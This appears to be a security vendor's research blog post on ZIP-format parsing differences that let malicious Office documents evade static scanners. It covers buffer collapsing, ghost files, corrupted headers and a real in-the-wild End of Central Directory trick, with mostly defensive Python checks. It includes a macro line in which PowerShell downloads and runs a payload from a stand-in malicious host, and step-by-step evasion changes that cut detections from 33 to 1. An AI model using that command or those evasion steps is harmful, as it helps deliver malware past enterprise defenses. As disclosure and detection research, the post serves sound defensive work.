Static engines have become a standard in automatic detection for large enterprises thanks to their accurate and quick detection. When it comes to attacks on enterprise organizations, email attacks make up 91% of all cyber attack attempts. If an attacker finds a way through the organization's defenses, the organization is compromised, and the potential damage can reach millions of dollars.

Today, most email file attachments are documents, such as Microsoft Office Word or Excel documents (docx, xlsx, xlsm, etc.). Most new Microsoft Office files have a special structure, but in reality they are just ZIP-compressed files containing the document's media, structure, and text.
Because all of these files are candidate attack vectors against organizations, detection engines must be able to parse them correctly to detect exploitation attempts and attacks on enterprises.

In this blog post I will cover ways to exploit security vendors' static detection engines, focusing on the ZIP file format: how it is parsed, how different parsers can fail to detect malicious content, and how attackers can potentially bypass detection engines and infiltrate the organization. Finally, I will provide an in-the-wild example of an attack exploiting such techniques.

Basics

Before we dive into the technical details, let's first understand the basics of the ZIP file format. I will not cover the entire ZIP file structure in this blog post; the focus is on how file content is parsed and how that parsing can be exploited. Here is a hex snippet of a simple ZIP file containing two different files, file1 and file2. Each part beginning with PK is the start of a header of a new section. For simplicity and readability, no compression was used in these files (compression method Store).

RED: File Header entry of file `file2`
GREEN: File Header entry of file `file1`
BLUE: Central Directory File Header of `file2`
ORANGE: Central Directory File Header of `file1`
The rest of the data closes the PK file format (the End of Central Directory record).

Each Local File Header contains metadata about the file, such as the file name, data length, compression method and more. The actual file content follows the metadata. For example, in the first file header entry:

BLUE: Metadata
RED: File name
GREEN: File content
More information about the file format can be found on Wikipedia.
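To make the layout concrete, here is a minimal Python sketch that reads one Local File Header with the standard `struct` module. The field order follows the ZIP specification. The helper names `parse_local_header` and `build_sample` are illustrative and not part of the original analysis, and the two-file sample archive is an assumption generated with Python's `zipfile` using the Store method.

```python
import io
import struct
import zipfile

# Fixed 30-byte part of a Local File Header (little-endian):
# signature, version, flags, method, mod time, mod date,
# CRC-32, compressed size, uncompressed size, name length, extra length.
LOCAL_HEADER = struct.Struct("<4sHHHHHIIIHH")


def parse_local_header(data, offset=0):
    """Return the metadata, file name and raw content of one entry."""
    (sig, _version, _flags, method, _mtime, _mdate,
     crc, csize, usize, name_len, extra_len) = LOCAL_HEADER.unpack_from(data, offset)
    if sig != b"PK\x03\x04":
        raise ValueError("no Local File Header at offset %d" % offset)
    name_start = offset + LOCAL_HEADER.size
    content_start = name_start + name_len + extra_len
    return {
        "name": data[name_start:name_start + name_len].decode("cp437"),
        "method": method,            # 0 means Store (no compression)
        "crc32": crc,
        "compressed_size": csize,
        "uncompressed_size": usize,
        "content": data[content_start:content_start + csize],
    }


def build_sample():
    """Hypothetical two-file archive, stored without compression."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("file1", "AAAA")
        zf.writestr("file2", "BBBB")
    return buf.getvalue()


if __name__ == "__main__":
    print(parse_local_header(build_sample()))
```

The three parts of the returned dictionary correspond to the metadata, file name, and file content regions of the header entry.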

File buffers collapsing

Some engines parse files using the Central Directory File Header, while others walk through each of the Local File Headers that are present, one after the other. Calculating the size of each Local File Header record is simple: add the known header size to the file name length, the extra field length, and the content length. This way you can go through all the file headers until you reach the Central Directory File Header. Another method is to simply search for the Central Directory File Header magic, which is 0x02014B50.
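Both approaches can be sketched in a few lines of Python. This is only an illustration under simplifying assumptions (no ZIP64, no data descriptors, archive starts at offset 0); the function names and the sample archive are hypothetical.

```python
import io
import struct
import zipfile

LOCAL_HEADER = struct.Struct("<4sHHHHHIIIHH")   # fixed 30-byte part
LOCAL_MAGIC = b"PK\x03\x04"                     # 0x04034B50 as stored on disk
CENTRAL_MAGIC = b"PK\x01\x02"                   # 0x02014B50 as stored on disk


def walk_local_headers(data):
    """Method 1: hop from one Local File Header to the next.

    Returns the (offset, name) pairs found and the offset where the walk
    stopped. Entries written with a data descriptor (flag bit 3) carry
    zero sizes in this header, so this simple walk cannot skip their content.
    """
    entries = []
    offset = 0
    while (offset + LOCAL_HEADER.size <= len(data)
           and data[offset:offset + 4] == LOCAL_MAGIC):
        fields = LOCAL_HEADER.unpack_from(data, offset)
        csize, name_len, extra_len = fields[7], fields[9], fields[10]
        name_start = offset + LOCAL_HEADER.size
        name = data[name_start:name_start + name_len].decode("cp437")
        entries.append((offset, name))
        # header size + file name + extra field + content
        offset = name_start + name_len + extra_len + csize
    return entries, offset


def find_central_directory(data):
    """Method 2: search for the first Central Directory magic."""
    return data.find(CENTRAL_MAGIC)


def build_sample():
    """Hypothetical two-file archive, stored without compression."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("file1", "AAAA")
        zf.writestr("file2", "BBBB")
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample()
    print(walk_local_headers(sample), find_central_directory(sample))
```

On a well-formed archive the walk ends exactly where the magic search lands. The attacks described in this post work by making those two views disagree.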

Let’s examine the Central Directory File Header hexdump:

The offset from the beginning of the file is shown in red. It is also possible to parse the content of a ZIP file starting from the Central Directory File Header, by following each file's offset.
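A parser that trusts the Central Directory could look roughly like the following sketch. It locates the End of Central Directory record, then reads each Central Directory File Header and its local header offset. The names are illustrative, and ZIP64 and multi-disk archives are deliberately ignored.

```python
import io
import struct
import zipfile

# End of Central Directory record (22 bytes without the comment).
EOCD = struct.Struct("<4sHHHHIIH")
# Fixed 46-byte part of a Central Directory File Header.
CENTRAL = struct.Struct("<4sHHHHHHIIIHHHHHII")


def central_directory_entries(data):
    """Return (file name, local header offset) for every listed entry."""
    eocd_pos = data.rfind(b"PK\x05\x06")
    if eocd_pos < 0:
        raise ValueError("no End of Central Directory record")
    (_sig, _disk, _cd_disk, _on_disk, total,
     _cd_size, cd_offset, _comment_len) = EOCD.unpack_from(data, eocd_pos)
    entries = []
    pos = cd_offset
    for _ in range(total):
        fields = CENTRAL.unpack_from(data, pos)
        if fields[0] != b"PK\x01\x02":
            raise ValueError("bad Central Directory entry at %d" % pos)
        name_len, extra_len, comment_len = fields[10], fields[11], fields[12]
        local_offset = fields[16]        # offset from the start of the file
        name_start = pos + CENTRAL.size
        name = data[name_start:name_start + name_len].decode("cp437")
        entries.append((name, local_offset))
        pos = name_start + name_len + extra_len + comment_len
    return entries


def build_sample():
    """Hypothetical two-file archive, stored without compression."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("file1", "AAAA")
        zf.writestr("file2", "BBBB")
    return buf.getvalue()


if __name__ == "__main__":
    print(central_directory_entries(build_sample()))
```

Note that this parser never looks at bytes the directory does not point to, which is exactly the blind spot the following techniques rely on.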

If different engines parse the files differently, it is possible to insert hidden files that some parsers will detect and others will not.

One way to do this is to add a crafted file header inside another file's content. This creates a file that some parsers will detect and others won't. Here is the hexdump of a simple variant of such a crafted file:

RED: The length of the original file, whose original content was the letter “B” repeated 320 (0x140) times.
GREEN: Inside the original file's content, a new crafted PK header was created to include a new file with different content and a different file name (file9). Another Central Directory File Header is then added at the end of the ZIP file, pointing to the new crafted header as if it were a legitimate file. Some parsers will see the content of file9, while others will ignore it and parse the original file as a whole.

The buffers collapsing attack can get more complicated, where one file can contain several other files. See illustrations as examples:

And this is what the Central Directory File Header looks like:

The results of extracting the crafted ZIP file vary between different versions of extractors, so the file can effectively bypass different engines, depending on how they parse it.
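From the defender's side, one possible check for this trick is to look for Central Directory entries whose local header starts inside the byte range of another entry. The sketch below builds a small test archive in the spirit of the file1/file9 example (320 bytes of "B" with a crafted record inside) and flags the overlap. All helper names, the position of the crafted record, and its content are assumptions made for illustration.

```python
import struct
import zlib

LOCAL = struct.Struct("<4sHHHHHIIIHH")
CENTRAL = struct.Struct("<4sHHHHHHIIIHHHHHII")
EOCD = struct.Struct("<4sHHHHIIH")


def local_record(name, content):
    """One stored (uncompressed) Local File Header followed by its content."""
    return LOCAL.pack(b"PK\x03\x04", 20, 0, 0, 0, 0x21, zlib.crc32(content),
                      len(content), len(content), len(name), 0) + name + content


def central_record(name, content, offset):
    """Central Directory File Header pointing at a local header offset."""
    return CENTRAL.pack(b"PK\x01\x02", 20, 20, 0, 0, 0, 0x21,
                        zlib.crc32(content), len(content), len(content),
                        len(name), 0, 0, 0, 0, 0, offset) + name


def build_collapsed_zip():
    """file1 holds 320 bytes with a crafted file9 record hidden inside."""
    inner = local_record(b"file9", b"hidden")
    outer_content = b"B" * 100 + inner + b"B" * (320 - 100 - len(inner))
    outer = local_record(b"file1", outer_content)
    inner_offset = LOCAL.size + len(b"file1") + 100
    cd = (central_record(b"file1", outer_content, 0)
          + central_record(b"file9", b"hidden", inner_offset))
    eocd = EOCD.pack(b"PK\x05\x06", 0, 0, 2, 2, len(cd), len(outer), 0)
    return outer + cd + eocd


def overlapping_entries(data):
    """Names of listed entries that start inside another listed entry."""
    eocd_pos = data.rfind(b"PK\x05\x06")
    fields = EOCD.unpack_from(data, eocd_pos)
    total, pos = fields[4], fields[6]
    spans = []
    for _ in range(total):
        c = CENTRAL.unpack_from(data, pos)
        name_start = pos + CENTRAL.size
        name = data[name_start:name_start + c[10]].decode("cp437")
        start = c[16]
        lf = LOCAL.unpack_from(data, start)
        # local header + name + extra field + content
        end = start + LOCAL.size + lf[9] + lf[10] + lf[7]
        spans.append((name, start, end))
        pos = name_start + c[10] + c[11] + c[12]
    return [name for name, start, _end in spans
            if any(o_start < start < o_end
                   for other, o_start, o_end in spans if other != name)]


if __name__ == "__main__":
    print(overlapping_entries(build_collapsed_zip()))
```

A scanner that finds such an overlap does not need to decide which parser is "right"; the overlap itself is a strong signal that the archive was crafted.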

Ghost File

In the previous method, we added a crafted file between seemingly legitimate files. By changing the content of the Central Directory File Header, we could point to our crafted buffer, and different parsers would extract different content.

In this method we attack ZIP file parsers from a different angle. Instead of inserting a pointer to a crafted file into the Central Directory File Header, we simply add a Local File Header record for a new file without adding a pointer to it in the Central Directory File Header. Parsers that enumerate files from the Central Directory File Header will not see the file at all, while parsers that enumerate all Local File Headers will see it.
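A detection engine can surface ghost files by running both enumeration strategies and comparing the results. The following is a minimal sketch under simplifying assumptions (no ZIP64, no data descriptors); the function names and the `ghost.txt` test record are hypothetical.

```python
import io
import struct
import zipfile
import zlib

LOCAL = struct.Struct("<4sHHHHHIIIHH")
CENTRAL = struct.Struct("<4sHHHHHHIIIHHHHHII")
EOCD = struct.Struct("<4sHHHHIIH")


def local_names(data):
    """Names seen by a parser that enumerates Local File Headers."""
    names, pos = [], 0
    while pos + LOCAL.size <= len(data) and data[pos:pos + 4] == b"PK\x03\x04":
        f = LOCAL.unpack_from(data, pos)
        start = pos + LOCAL.size
        names.append(data[start:start + f[9]].decode("cp437"))
        pos = start + f[9] + f[10] + f[7]   # name + extra field + content
    return names


def central_names(data):
    """Names seen by a parser that trusts the Central Directory."""
    eocd_pos = data.rfind(b"PK\x05\x06")
    if eocd_pos < 0:
        raise ValueError("no End of Central Directory record")
    fields = EOCD.unpack_from(data, eocd_pos)
    total, pos = fields[4], fields[6]
    names = []
    for _ in range(total):
        c = CENTRAL.unpack_from(data, pos)
        start = pos + CENTRAL.size
        names.append(data[start:start + c[10]].decode("cp437"))
        pos = start + c[10] + c[11] + c[12]
    return names


def ghost_files(data):
    """Local entries that the Central Directory does not list."""
    listed = set(central_names(data))
    return [name for name in local_names(data) if name not in listed]


def build_ghost_sample():
    """Hypothetical test archive: file1 is listed, ghost.txt is not."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("file1", "AAAA")
    data = buf.getvalue()
    eocd_pos = data.rfind(b"PK\x05\x06")
    fields = list(EOCD.unpack_from(data, eocd_pos))
    cd_offset = fields[6]
    content = b"unlisted"
    ghost = LOCAL.pack(b"PK\x03\x04", 20, 0, 0, 0, 0x21, zlib.crc32(content),
                       len(content), len(content), 9, 0) + b"ghost.txt" + content
    fields[6] = cd_offset + len(ghost)      # the directory moved down
    return (data[:cd_offset] + ghost + data[cd_offset:eocd_pos]
            + EOCD.pack(*fields))


if __name__ == "__main__":
    print(ghost_files(build_ghost_sample()))
```

Python's own `zipfile` module reads the Central Directory, so it lists only `file1` for this sample, which illustrates how two reasonable parsers can disagree about the same bytes.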

Invalid File Header

Some engines stop their analysis once they hit unexpected behavior. Other parsers, such as the one in Microsoft Office, make a best effort to analyze the rest of the file. Adding a simple corrupted header with an invalid CRC, a length field set to 0xFFFF (the maximum value), and a short file name that does not reach a length of 0xFFFF produces a corrupted file header that confuses static engines. Here is a simple hexdump example of such a Local File Header:
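Rather than aborting on such a header, a static engine could record the inconsistency and keep scanning. The sketch below checks one Local File Header for the two symptoms mentioned above: declared lengths that run past the end of the file, and a CRC that does not match the content. It assumes stored (uncompressed) entries for the CRC check, and the function names and sample archive are illustrative only.

```python
import io
import struct
import zipfile
import zlib

LOCAL = struct.Struct("<4sHHHHHIIIHH")


def local_header_problems(data, offset=0):
    """Return a list of inconsistencies found in one Local File Header."""
    (sig, _version, flags, method, _mtime, _mdate,
     crc, csize, _usize, name_len, extra_len) = LOCAL.unpack_from(data, offset)
    if sig != b"PK\x03\x04":
        return ["missing Local File Header signature"]
    content_start = offset + LOCAL.size + name_len + extra_len
    if content_start + csize > len(data):
        # e.g. a name length of 0xFFFF followed by a much shorter name
        return ["declared lengths run past the end of the file"]
    problems = []
    content = data[content_start:content_start + csize]
    # Only stored entries without a data descriptor can be checked directly.
    if method == 0 and not flags & 0x08 and zlib.crc32(content) != crc:
        problems.append("CRC-32 does not match the stored content")
    return problems


def build_sample():
    """Hypothetical one-file archive, stored without compression."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("file1", "AAAA")
    return buf.getvalue()


if __name__ == "__main__":
    broken = bytearray(build_sample())
    struct.pack_into("<H", broken, 26, 0xFFFF)   # name length field
    print(local_header_problems(bytes(broken)))
```

Returning a list instead of raising keeps the decision with the caller: a non-empty result can raise the file's suspicion score while the remaining headers are still analyzed.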

Implementation example of Central Directory File Header adjusting attack

We start by creating a simple Word document with a macro that executes the following command:

powershell.exe ""IEX ((new-object net.webclient).downloadstring('http://my_malicious.com/payload.exe '))""

Result in VirusTotal:

Only 33/59 engines detected the file.

After simply changing the Central Directory File Header by removing the entry for vbaProject.bin, the file containing all the macros, the results are astonishing:

Only 17/59 engines detected the malicious macro, roughly a 50% drop from a simple change to the document file. When the file is opened in Word, the malicious behavior works the same. The only difference is that Word asks the user whether to recover the file:

Clicking Yes executes all macros as usual.

To reduce detection even further, an invalid header with a bad CRC was added to one of the Local File Headers, as explained earlier. Adding the invalid header reduced the VirusTotal static engine results to 1 detection out of 61 engines:

The file's dynamic behavior remained malicious, with PowerShell being dropped and executed.

Corrupted ZIP File, Exploiting End of Central Directory Record, Real Malware In the wild

Mimecast’s research team found in-the-wild attacks that change the ZIP structure in a way that causes different parsing engines to fail, while Microsoft Office succeeds. A regular ZIP file is made of several different headers.
It starts with the Local File Header entries, which contain both the metadata and the content of the files. Then come the Central Directory File Header entries, which contain the file tree information for the ZIP file. Finally, the file is closed with an End of Central Directory Header entry, the very last header of the archive, which marks the end of the information in the ZIP file and is how regular ZIP files end.

However, in the analyzed attack, the attacker altered the Central Directory File Header entries so that they contain invalid data when parsed, followed by an End of Central Directory Header entry, which looks like the end of the ZIP file to some parsers. After this ending header, duplicated and corrected Central Directory File Header entries are added, along with a second End of Central Directory Header entry. This fools parsers that do not try to parse the rest of the headers into using the invalid data.

In the illustration below you can see the End of Central Directory header followed by more data, which should not normally be there. Some parsers do not try to read the data that comes after this header, in contrast to Microsoft Office, whose parser tries to get as much information as possible from the file.

The End of Central Directory header begins with 0x06054B50.

Below you can find an annotated illustration of the attack. The Local File Headers are accurate and contain valid data for the files inside the ZIP structure. They are followed by corrupted, incorrect Central Directory File Headers and a fake End of Central Directory header, intended to make parsers end their content evaluation there. After that End of Central Directory header, the correct Central Directory File Headers, which show the correct content of the files, are added.
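A simple heuristic for this layout is to count End of Central Directory records and to measure how much data follows the first one. The sketch below does that with a plain signature search. The function names are hypothetical, the signature can also occur by chance inside file content, and `append_second_directory` only mimics the layout well enough to exercise the check; it is not a faithful reproduction of the analyzed samples.

```python
import io
import struct
import zipfile

EOCD = struct.Struct("<4sHHHHIIH")     # 22 bytes, followed by an optional comment
EOCD_MAGIC = b"PK\x05\x06"             # 0x06054B50 as stored on disk


def eocd_records(data):
    """Offsets of every candidate End of Central Directory record."""
    found = []
    pos = data.find(EOCD_MAGIC)
    while pos != -1:
        if pos + EOCD.size <= len(data):
            found.append(pos)
        pos = data.find(EOCD_MAGIC, pos + 1)
    return found


def trailing_bytes_after_first_eocd(data):
    """Bytes left after the first record and its comment (0 for a normal ZIP)."""
    records = eocd_records(data)
    if not records:
        raise ValueError("no End of Central Directory record")
    first = records[0]
    comment_len = EOCD.unpack_from(data, first)[7]
    return max(0, len(data) - (first + EOCD.size + comment_len))


def build_sample():
    """Hypothetical two-file archive, stored without compression."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("file1", "AAAA")
        zf.writestr("file2", "BBBB")
    return buf.getvalue()


def append_second_directory(data):
    """Test helper: repeat the directory and its end record after the first end record."""
    cd_offset = EOCD.unpack_from(data, data.rfind(EOCD_MAGIC))[6]
    return data + data[cd_offset:]


if __name__ == "__main__":
    crafted = append_second_directory(build_sample())
    print(len(eocd_records(crafted)), trailing_bytes_after_first_eocd(crafted))
```

More than one record, or any trailing bytes after the first one, means that a parser stopping at the first End of Central Directory header and a best-effort parser such as the one in Microsoft Office may see different archives.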

In the wild samples:

  • 97a363e1829277d24dd6d212f486023f1e30d451ca4a2d7fb49de5a52bbed7ed
  • E707411036cf105d8b634e4f104f6bb1c95be8b4dcf574bdb5b2a265c6818233
  • ecb9cfea13863f38b404040da47cb85f7b7bb27641783db56e560072c824d14b